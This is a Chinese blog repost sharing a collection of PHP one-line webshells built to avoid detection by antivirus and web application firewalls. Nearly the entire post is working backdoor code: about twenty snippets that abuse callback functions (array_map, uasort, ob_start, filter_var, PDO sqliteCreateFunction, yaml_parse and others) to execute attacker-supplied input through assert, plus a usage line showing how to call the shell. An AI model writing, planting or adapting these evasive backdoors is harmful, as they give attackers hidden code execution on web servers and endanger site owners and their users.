最新消息:

分享一些无特征PHP一句话(转)

收集 pang0lin 489浏览 0评论

原文:http://www.lengbaikai.net/2016/10/31/%e5%88%86%e4%ba%ab%e4%b8%80%e4%ba%9b%e6%97%a0%e7%89%b9%e5%be%81php%e4%b8%80%e5%8f%a5%e8%af%9d/

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)

原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html

所有一句话使用方法基本都是:

http:// target/shell.php?e=assert 密码pass

 

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);

 

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map($e, $arr);

 

$e = $_REQUEST['e'];

$arr = array('test', $_REQUEST['pass']);

uasort($arr, $e);

 

$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);

 

$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');

 

$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');

 

$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);

 

$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);

 

$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');

 

$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');

 

mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');

 

echo preg_filter('|.*|e', $_REQUEST['pass'], '');

 

ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();

 

$e = $_REQUEST['e'];

register_shutdown_function($e, $_REQUEST['pass']);

 

$e = $_REQUEST['e'];

declare(ticks=1);

register_tick_function($e, $_REQUEST['pass']);

 

filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));

 

filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

 

$e = $_REQUEST['e'];

$db = new PDO('sqlite:sqlite.db3');

$db->sqliteCreateFunction('myfunc', $e, 1);

$sth = $db->prepare("SELECT myfunc(:exec)");

$sth->execute(array(':exec' => $_REQUEST['pass']));

 

preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

 

$mem = new Memcache();

$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));

$mem->connect($_REQUEST['pass'], 11211, 0);

 

mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

 

$str = urlencode($_REQUEST['pass']);

$yaml = <<<EOD

greeting: !{$str} "|.+|e"

EOD;

$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));

 

转载请注明:我是穿山甲,小弟穿山乙 » 分享一些无特征PHP一句话(转)

发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址